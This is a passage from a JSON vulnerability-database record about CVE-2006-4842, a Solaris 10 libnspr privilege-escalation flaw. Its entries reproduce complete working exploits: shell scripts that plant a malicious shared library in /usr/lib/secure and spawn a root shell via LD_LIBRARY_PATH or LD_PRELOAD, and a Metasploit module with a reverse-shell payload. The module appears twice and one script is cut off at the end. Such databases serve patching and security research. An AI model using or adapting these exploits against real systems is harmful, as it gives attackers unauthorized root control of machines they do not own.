platform", "published": "2006-10-24T00:00:00", "type": "exploitdb", "title": "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-24T00:00:00", "id": "EDB-ID:28789", "href": "https://www.exploit-db.com/exploits/28789/", "sourceData": "source: http://www.securityfocus.com/bid/20471/info\r\n \r\nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\r\n \r\nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \r\n \r\nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.\r\n\r\n#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\r\n#\r\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of \r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Yet another newschool version of the local root exploit: this time we place\r\n# our code in the global constructor (ctors) for the library, as suggested by\r\n# gera. This way, we don't have to hide a real function and we have a generic\r\n# library that can be used in all exploits like this. To avoid annoying side-\r\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\r\n# a library in the default search path.\r\n#\r\n# See also:\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr3\r\n# $ ./raptor_libnspr3\r\n# [...]\r\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=1(other)\r\n# # rm /usr/lib/secure/libldap.so.5\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho \"raptor_libnspr3 - Solaris 10 libnspr constructor exploit\"\r\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/sbin/lpmove\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho \"void __attribute__ ((constructor)) cons() {\" > /tmp/ctors.c\r\necho \" setuid(0);\" >> /tmp/ctors.c\r\necho \" execle(\\\"/bin/ksh\\\", \\\"ksh\\\", 0, 0);\" >> /tmp/ctors.c\r\necho \"}\" >> /tmp/ctors.c\r\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\r\nif [ $? -ne 0 ]; then\r\n\techo \"problems compiling evil shared library, check your gcc\"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_LIBRARY_PATH foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_LIBRARY_PATH=/usr/lib/secure su -\r\n\r\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28789/"}, {"lastseen": "2016-01-31T16:34:17", "description": "Solaris 10 libnspr LD_PRELOAD Arbitrary File Creation Local Root Exploit. CVE-2006-4842. Local exploit for solaris platform", "published": "2006-10-16T00:00:00", "type": "exploitdb", "title": "Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-16T00:00:00", "id": "EDB-ID:2569", "href": "https://www.exploit-db.com/exploits/2569/", "sourceData": "#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr2,v 1.4 2006/10/16 11:50:48 raptor Exp $\r\n#\r\n# raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Newschool version of local root exploit via LD_PRELOAD (hi KF!). Another\r\n# possible (but less l33t;) attack vector is /var/spool/cron/atjobs.\r\n#\r\n# See also: http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr2\r\n# $ ./raptor_libnspr2\r\n# [...]\r\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # rm /usr/lib/secure/getuid.so\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho \"raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit\"\r\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/getuid.so\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho \"int getuid(){return 0;}\" > /tmp/getuid.c\r\ngcc -fPIC -Wall -g -O2 -shared -o /usr/lib/secure/getuid.so /tmp/getuid.c -lc\r\nif [ $? -ne 0 ]; then\r\n\techo \"problems compiling evil shared library, check your gcc\"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_PRELOAD foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_PRELOAD=/usr/lib/secure/getuid.so su -\r\n\r\n# milw0rm.com [2006-10-16]\r\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2569/"}, {"lastseen": "2018-10-07T14:34:04", "description": "Solaris - libnspr NSPR_LOG_FILE Privilege Escalation (Metasploit). CVE-2006-4842. Local exploit for Solaris platform. Tags: Metasploit Framework (MSF), Local", "published": "2018-09-18T00:00:00", "type": "exploitdb", "title": "Solaris - libnspr NSPR_LOG_FILE Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2018-09-18T00:00:00", "id": "EDB-ID:45433", "href": "https://www.exploit-db.com/exploits/45433/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Solaris::Priv\r\n include Msf::Post::Solaris::System\r\n include Msf::Post::Solaris::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits an arbitrary file write vulnerability in the\r\n Netscape Portable Runtime library (libnspr) on unpatched Solaris systems\r\n prior to Solaris 10u3 which allows users to gain root privileges.\r\n\r\n libnspr versions prior to 4.6.3 allow users to specify a log file with\r\n the `NSPR_LOG_FILE` environment variable. The log file is created with\r\n the privileges of the running process, resulting in privilege escalation\r\n when used in combination with a SUID executable.\r\n\r\n This module writes a shared object to the trusted library directory\r\n `/usr/lib/secure` and runs the specified SUID binary with the shared\r\n object loaded using the `LD_LIBRARY_PATH` environment variable.\r\n\r\n This module has been tested successfully with libnspr version 4.5.1\r\n on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).\r\n },\r\n 'References' =>\r\n [\r\n ['BID', '20471'],\r\n ['CVE', '2006-4842'],\r\n ['EDB', '2543'],\r\n ['EDB', '2569'],\r\n ['EDB', '2641'],\r\n ['URL', 'https://securitytracker.com/id/1017050'],\r\n ['URL', 'https://securitytracker.com/id/1017051'],\r\n ['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],\r\n ['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],\r\n ['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'iDefense', # Discovery\r\n 'Marco Ivaldi', # Exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Oct 11 2006',\r\n 'Privileged' => true,\r\n 'Platform' => ['solaris'],\r\n 'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],\r\n 'Targets' => [['Auto', {}]],\r\n 'SessionTypes' => ['shell', 'meterpreter'],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',\r\n 'WfsDelay' => 10,\r\n 'PrependFork' => true\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n # Some useful example SUID executables:\r\n # * /usr/bin/cancel\r\n # * /usr/bin/chkey\r\n # * /usr/bin/lp\r\n # * /usr/bin/lpset\r\n # * /usr/bin/lpstat\r\n # * /usr/lib/lp/bin/netpr\r\n # * /usr/sbin/lpmove\r\n OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel'])\r\n ]\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def suid_bin_path\r\n datastore['SUID_PATH']\r\n end\r\n\r\n def is_writable?(path)\r\n cmd_exec(\"[ -w #{path} ] && echo true\").include? 'true'\r\n end\r\n\r\n def mkdir(path)\r\n vprint_status \"Creating directory '#{path}'\"\r\n cmd_exec \"mkdir -p '#{path}'\"\r\n register_dir_for_cleanup path\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n\r\n output = cmd_exec \"PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c\"\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n end\r\n\r\n def check\r\n unless setuid? suid_bin_path\r\n vprint_error \"#{suid_bin_path} is not setuid\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{suid_bin_path} is setuid\"\r\n\r\n unless has_gcc?\r\n vprint_error 'gcc is not installed'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'gcc is installed'\r\n\r\n # libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable\r\n # Earlier versions may also be vulnerable\r\n libnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr'\r\n libnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\\s+([\\d\\.]+),/).flatten.first\r\n if libnspr_pkg_version.to_s.eql? ''\r\n vprint_error 'Could not determine libnspr version'\r\n return CheckCode::Unknown\r\n end\r\n\r\n if Gem::Version.new(libnspr_pkg_version) >= Gem::Version.new('4.6.3')\r\n vprint_error \"libnspr version #{libnspr_pkg_version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"libnspr version #{libnspr_pkg_version} appears to be vulnerable\"\r\n\r\n # Solaris 10 versions prior to the 2006 patches are known to be vulnerable.\r\n # Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default,\r\n # however third-party software may also introduce a vulnerable version of the library.\r\n version = kernel_release\r\n if version.to_s.eql? ''\r\n vprint_error 'Could not determine Solaris version'\r\n return CheckCode::Detected\r\n end\r\n\r\n unless Gem::Version.new(version) <= Gem::Version.new('5.10')\r\n vprint_error \"Solaris version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Solaris version #{version} appears to be vulnerable\"\r\n\r\n # The vulnerability was patched in various Solaris patches for different platforms.\r\n # For more information, see:\r\n # - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1\r\n installed_patches = cmd_exec 'showrev -p'\r\n [\r\n 119214, # Solaris 10 (x86) patch 119214-10\r\n 119213, # Solaris 10 (SPARC) patch 119213-10\r\n 119212, # Solaris 9 (x86) patch 119212-10\r\n 119211, # Solaris 9 (SPARC) patch 119211-10\r\n 119209 # Solaris 8 (SPARC) patch 119209-10\r\n ].each do |patch|\r\n if installed_patches =~ / #{patch}-(\\d+)/\r\n revision = $1.to_i\r\n if revision >= 10\r\n vprint_error \"Solaris patch #{patch}-#{revision} has been applied\"\r\n return CheckCode::Safe\r\n end\r\n end\r\n end\r\n vprint_good 'Solaris patches are not installed'\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless [CheckCode::Detected, CheckCode::Appears].include? check\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n unless is_writable? datastore['WritableDir']\r\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\r\n end\r\n\r\n # Create writable file in /usr/lib/secure\r\n lib_path = '/usr/lib/secure'\r\n lib_name = 'libldap.so.5'\r\n\r\n vprint_status \"Creating file #{lib_path}/#{lib_name}\"\r\n cmd_exec 'umask 0'\r\n cmd_exec \"NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=\\\"#{lib_path}/#{lib_name}\\\" #{suid_bin_path}\"\r\n cmd_exec \"NSPR_LOG_FILE=#{lib_path}/#{lib_name} #{suid_bin_path}\"\r\n cmd_exec 'umask 022'\r\n\r\n unless is_writable? \"#{lib_path}/#{lib_name}\"\r\n fail_with Failure::Unknown, \"Could not create file '#{lib_path}/#{lib_name}'\"\r\n end\r\n\r\n print_good \"Created file #{lib_path}/#{lib_name}\"\r\n register_file_for_cleanup \"#{lib_path}/#{lib_name}\"\r\n\r\n # Upload and compile shared object\r\n base_path = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}\"\r\n mkdir base_path\r\n\r\n payload_name = \".#{rand_text_alphanumeric 5..10}\"\r\n payload_path = \"#{base_path}/#{payload_name}\"\r\n\r\n so = <<-EOF\r\n void __attribute__((constructor)) cons() {\r\n setuid(0);\r\n setgid(0);\r\n execle(\"#{payload_path}\", \"\", 0, 0);\r\n _exit(0);\r\n }\r\n EOF\r\n\r\n so_name = \".#{rand_text_alphanumeric 5..10}\"\r\n so_path = \"#{base_path}/#{so_name}\"\r\n upload_and_compile so_path, so\r\n\r\n vprint_status \"Writing shared object #{lib_path}/#{lib_name}\"\r\n cmd_exec \"cp '#{so_path}' '#{lib_path}/#{lib_name}'\"\r\n register_file_for_cleanup \"#{lib_path}/#{lib_name}\"\r\n\r\n # Upload and execute payload\r\n upload payload_path, generate_payload_exe\r\n cmd_exec \"chmod +x #{payload_path}\"\r\n\r\n print_status 'Executing payload...'\r\n cmd_exec \"LD_LIBRARY_PATH=\\\"#{lib_path}\\\" #{suid_bin_path} & echo \"\r\n end\r\nend", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45433/"}], "zdt": [{"lastseen": "2018-09-18T17:14:11", "description": "This Metasploit module exploits an arbitrary file write vulnerability in the Netscape Portable Runtime library (libnspr) on unpatched Solaris systems prior to Solaris 10u3 which allows users to gain root privileges. libnspr versions prior to 4.6.3 allow users to specify a log file with the `NSPR_LOG_FILE` environment variable. The log file is created with the privileges of the running process, resulting in privilege escalation when used in combination with a SUID executable. This Metasploit module writes a shared object to the trusted library directory `/usr/lib/secure` and runs the specified SUID binary with the shared object loaded using the `LD_LIBRARY_PATH` environment variable. This Metasploit module has been tested successfully with libnspr version 4.5.1 on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).", "edition": 1, "published": "2018-09-18T00:00:00", "title": "Solaris libnspr NSPR_LOG_FILE Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2018-09-18T00:00:00", "id": "1337DAY-ID-31125", "href": "https://0day.today/exploit/description/31125", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Solaris::Priv\r\n include Msf::Post::Solaris::System\r\n include Msf::Post::Solaris::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits an arbitrary file write vulnerability in the\r\n Netscape Portable Runtime library (libnspr) on unpatched Solaris systems\r\n prior to Solaris 10u3 which allows users to gain root privileges.\r\n\r\n libnspr versions prior to 4.6.3 allow users to specify a log file with\r\n the `NSPR_LOG_FILE` environment variable. The log file is created with\r\n the privileges of the running process, resulting in privilege escalation\r\n when used in combination with a SUID executable.\r\n\r\n This module writes a shared object to the trusted library directory\r\n `/usr/lib/secure` and runs the specified SUID binary with the shared\r\n object loaded using the `LD_LIBRARY_PATH` environment variable.\r\n\r\n This module has been tested successfully with libnspr version 4.5.1\r\n on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).\r\n },\r\n 'References' =>\r\n [\r\n ['BID', '20471'],\r\n ['CVE', '2006-4842'],\r\n ['EDB', '2543'],\r\n ['EDB', '2569'],\r\n ['EDB', '2641'],\r\n ['URL', 'https://securitytracker.com/id/1017050'],\r\n ['URL', 'https://securitytracker.com/id/1017051'],\r\n ['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],\r\n ['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],\r\n ['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'iDefense', # Discovery\r\n 'Marco Ivaldi', # Exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Oct 11 2006',\r\n 'Privileged' => true,\r\n 'Platform' => ['solaris'],\r\n 'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],\r\n 'Targets' => [['Auto', {}]],\r\n 'SessionTypes' => ['shell', 'meterpreter'],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',\r\n 'WfsDelay' => 10,\r\n 'PrependFork' => true\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n # Some useful example SUID executables:\r\n # * /usr/bin/cancel\r\n # * /usr/bin/chkey\r\n # * /usr/bin/lp\r\n # * /usr/bin/lpset\r\n # * /usr/bin/lpstat\r\n # * /usr/lib/lp/bin/netpr\r\n # * /usr/sbin/lpmove\r\n OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel'])\r\n ]\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def suid_bin_path\r\n datastore['SUID_PATH']\r\n end\r\n\r\n def is_writable?(path)\r\n cmd_exec(\"[ -w #{path} ] && echo true\").include? 'true'\r\n end\r\n\r\n def mkdir(path)\r\n vprint_status \"Creating directory '#{path}'\"\r\n cmd_exec \"mkdir -p '#{path}'\"\r\n register_dir_for_cleanup path\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n\r\n output = cmd_exec \"PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c\"\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n end\r\n\r\n def check\r\n unless setuid? suid_bin_path\r\n vprint_error \"#{suid_bin_path} is not setuid\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{suid_bin_path} is setuid\"\r\n\r\n unless has_gcc?\r\n vprint_error 'gcc is not installed'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'gcc is installed'\r\n\r\n # libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable\r\n # Earlier versions may also be vulnerable\r\n libnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr'\r\n libnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\\s+([\\d\\.]+),/).flatten.first\r\n if libnspr_pkg_version.to_s.eql? ''\r\n vprint_error 'Could not determine libnspr version'\r\n return CheckCode::Unknown\r\n end\r\n\r\n if Gem::Version.new(libnspr_pkg_version) >= Gem::Version.new('4.6.3')\r\n vprint_error \"libnspr version #{libnspr_pkg_version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"libnspr version #{libnspr_pkg_version} appears to be vulnerable\"\r\n\r\n # Solaris 10 versions prior to the 2006 patches are known to be vulnerable.\r\n # Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default,\r\n # however third-party software may also introduce a vulnerable version of the library.\r\n version = kernel_release\r\n if version.to_s.eql? ''\r\n vprint_error 'Could not determine Solaris version'\r\n return CheckCode::Detected\r\n end\r\n\r\n unless Gem::Version.new(version) <= Gem::Version.new('5.10')\r\n vprint_error \"Solaris version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Solaris version #{version} appears to be vulnerable\"\r\n\r\n # The vulnerability was patched in various Solaris patches for different platforms.\r\n # For more information, see:\r\n # - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1\r\n installed_patches = cmd_exec 'showrev -p'\r\n [\r\n 119214, # Solaris 10 (x86) patch 119214-10\r\n 119213, # Solaris 10 (SPARC) patch 119213-10\r\n 119212, # Solaris 9 (x86) patch 119212-10\r\n 119211, # Solaris 9 (SPARC) patch 119211-10\r\n 119209 # Solaris 8 (SPARC) patch 119209-10\r\n ].each do |patch|\r\n if installed_patches =~ / #{patch}-(\\d+)/\r\n revision = $1.to_i\r\n if revision >= 10\r\n vprint_error \"Solaris patch #{patch}-#{revision} has been applied\"\r\n return CheckCode::Safe\r\n end\r\n end\r\n end\r\n vprint_good 'Solaris patches are not installed'\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless [CheckCode::Detected, CheckCode::Appears].include? check\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n unless is_writable? datastore['WritableDir']\r\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\r\n end\r\n\r\n # Create writable file in /usr/lib/secure\r\n lib_path = '/usr/lib/secure'\r\n lib_name = 'libldap.so.5'\r\n\r\n vprint_status \"Creating file #{lib_path}/#{lib_name}\"\r\n cmd_exec 'umask 0'\r\n cmd_exec \"NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=\\\"#{lib_path}/#{lib_name}\\\" #{suid_bin_path}\"\r\n cmd_exec \"NSPR_LOG_FILE=#{lib_path}/#{lib_name} #{suid_bin_path}\"\r\n cmd_exec 'umask 022'\r\n\r\n unless is_writable? \"#{lib_path}/#{lib_name}\"\r\n fail_with Failure::Unknown, \"Could not create file '#{lib_path}/#{lib_name}'\"\r\n end\r\n\r\n print_good \"Created file #{lib_path}/#{lib_name}\"\r\n register_file_for_cleanup \"#{lib_path}/#{lib_name}\"\r\n\r\n # Upload and compile shared object\r\n base_path = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}\"\r\n mkdir base_path\r\n\r\n payload_name = \".#{rand_text_alphanumeric 5..10}\"\r\n payload_path = \"#{base_path}/#{payload_name}\"\r\n\r\n so = <<-EOF\r\n void __attribute__((constructor)) cons() {\r\n setuid(0);\r\n setgid(0);\r\n execle(\"#{payload_path}\", \"\", 0, 0);\r\n _exit(0);\r\n }\r\n EOF\r\n\r\n so_name = \".#{rand_text_alphanumeric 5..10}\"\r\n so_path = \"#{base_path}/#{so_name}\"\r\n upload_and_compile so_path, so\r\n\r\n vprint_status \"Writing shared object #{lib_path}/#{lib_name}\"\r\n cmd_exec \"cp '#{so_path}' '#{lib_path}/#{lib_name}'\"\r\n register_file_for_cleanup \"#{lib_path}/#{lib_name}\"\r\n\r\n # Upload and execute payload\r\n upload payload_path, generate_payload_exe\r\n cmd_exec \"chmod +x #{payload_path}\"\r\n\r\n print_status 'Executing payload...'\r\n cmd_exec \"LD_LIBRARY_PATH=\\\"#{lib_path}\\\" #{suid_bin_path} & echo \"\r\n end\r\nend\n\n# 0day.today [2018-09-18] #", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31125"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:48", "description": "\nSolaris 10 libnspr - Constructor Arbitrary File Creation Privilege Escalation (3)", "edition": 1, "published": "2006-10-24T00:00:00", "title": "Solaris 10 libnspr - Constructor Arbitrary File Creation Privilege Escalation (3)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-24T00:00:00", "id": "EXPLOITPACK:17D069ABD6EE3DA02F1E1EC965F0B525", "href": "", "sourceData": "#!/bin/sh\n\n#\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\n#\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# Local exploitation of a design error vulnerability in version 4.6.1 of \n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \n# create or overwrite arbitrary files on the system. The problem exists \n# because environment variables are used to create log files. Even when the\n# program is setuid, users can specify a log file that will be created with \n# elevated privileges (CVE-2006-4842).\n#\n# Yet another newschool version of the local root exploit: this time we place\n# our code in the global constructor (ctors) for the library, as suggested by\n# gera. This way, we don't have to hide a real function and we have a generic\n# library that can be used in all exploits like this. To avoid annoying side-\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\n# a library in the default search path.\n#\n# See also:\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\n#\n# Usage:\n# $ chmod +x raptor_libnspr3\n# $ ./raptor_libnspr3\n# [...]\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\n# # id\n# uid=0(root) gid=1(other)\n# # rm /usr/lib/secure/libldap.so.5\n# #\n#\n# Vulnerable platforms (SPARC):\n# Solaris 10 without patch 119213-10 [tested]\n#\n# Vulnerable platforms (x86):\n# Solaris 10 without patch 119214-10 [untested]\n#\n\necho \"raptor_libnspr3 - Solaris 10 libnspr constructor exploit\"\necho \"Copyright (c) 2006 